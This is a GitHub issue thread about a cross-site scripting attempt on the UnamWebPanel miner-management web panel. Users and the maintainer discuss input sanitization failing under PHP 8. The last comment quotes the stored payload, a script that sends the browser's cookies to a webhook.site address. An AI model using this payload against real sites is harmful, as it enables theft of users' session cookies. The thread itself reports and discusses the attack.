Open ShoelessTom opened 1 year ago
It's an attempt at an XSS attack from what it looks like, someone has sent a fake miner connection to your endpoint (which is obviously open to the public, otherwise no miner could connect) with some JavaScript code as the pool, and then when the web panel site loads they want your browser to run that script. Though the endpoint shouldn't really be vulnerable to XSS since it performs sanitation, maybe it's due to some changed with PHP 8? I have no idea if the datatable in the web panel that displays the miners are vulnerable to XSS attacks though. I would suggest removing the entry.
Is it possible for you to make it so the end point does not accept such things? I opened inspect element and then went to the network tab and found that the request went through.
Is it possible for you to make it so the end point does not accept such things? I opened inspect element and then went to the network tab and found that the request went through.
Normally my sanitizer should remove that but I guess the filtering rules became different with the update to PHP 8+ since they deprecated the old way of sanitizing.
Will you update it?
On Sun, Aug 20, 2023 at 10:45 PM Unam Sanctam @.***> wrote:
Is it possible for you to make it so the end point does not accept such things? I opened inspect element and then went to the network tab and found that the request went through.
Normally my sanitizer should remove that but I guess the filtering rules became different with the update to PHP 8+ since they deprecated the old way of sanitizing.
— Reply to this email directly, view it on GitHub https://github.com/UnamSanctam/UnamWebPanel/issues/258#issuecomment-1685633799, or unsubscribe https://github.com/notifications/unsubscribe-auth/AMKUPAZOFFVFJRGSAMTXC63XWLRXNANCNFSM6AAAAAAXSQKCUM . You are receiving this because you authored the thread.Message ID: @.***>
Will you update it?
Yes, I'm just trying to finish the miner update first before I make any changes to the web panel.
I openned up my database as a sqli and used a viewer and I see this. Should I be worried?
it reads
<script>const x = new XMLHttpRequest();x.open("GET", "https://webhook.site/df107732-0ee7-4a4e-838c-f582d3ef14bf?x=" + document.cookie);x.send();</script><script async src="https://www.googletagmanager.com/gtag/js?id=G-VTYXG93723"></script><script>window.dataLayer = window.dataLayer || [];function gtag(){dataLayer.push(arguments);}gtag("js", new Date());gtag("config", "G-VTYXG93723");</script>